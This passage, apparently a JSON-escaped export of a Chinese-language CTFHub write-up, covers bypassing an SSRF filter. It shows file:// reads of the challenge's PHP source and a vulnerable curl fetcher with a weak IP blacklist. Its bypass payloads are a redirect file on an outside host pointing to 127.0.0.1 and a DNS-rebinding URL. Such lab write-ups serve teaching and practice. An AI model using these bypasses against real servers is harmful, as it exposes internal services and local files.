?url=file:\/\/\/var\/www\/html\/flag.php<\/code><\/pre>\n\n\n\n<?php\r\n\r\nerror_reporting(0);\r\n\r\nif ($_SERVER[\"REMOTE_ADDR\"] != \"127.0.0.1\") {\r\n echo \"Just View From 127.0.0.1\";\r\n exit;\r\n}\r\n\r\necho getenv(\"CTFHUB\");\r\n<\/code><\/pre>\n\n\n\n?url=file:\/\/\/var\/www\/html\/index.php<\/code><\/pre>\n\n\n\n<?php\r\n\r\nerror_reporting(0);\r\n\r\nif (!isset($_REQUEST['url'])) {\r\n header(\"Location: \/?url=_\");\r\n exit;\r\n}\r\n\r\n$url = $_REQUEST['url'];\r\n\r\nif (preg_match(\"\/127|172|10|192\/\", $url)) {\r\n exit(\"hacker! Ban Intranet IP\");\r\n}\r\n\r\n$ch = curl_init();\r\ncurl_setopt($ch, CURLOPT_URL, $url);\r\ncurl_setopt($ch, CURLOPT_HEADER, 0);\r\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_exec($ch);\r\ncurl_close($ch);\r\n<\/code><\/pre>\n\n\n\n<?php\r\nheader(\"Location:http:\/\/127.0.0.1\/flag.php\");\r\n?><\/code><\/pre>\n\n\n\n?url=http:\/\/121.36.193.62\/403.php<\/code><\/pre>\n\n\n\nDNS\u91cd\u7ed1\u5b9a Bypass<\/h3>\n\n\n\n
?url=http:\/\/sudo.cc\/flag.php<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"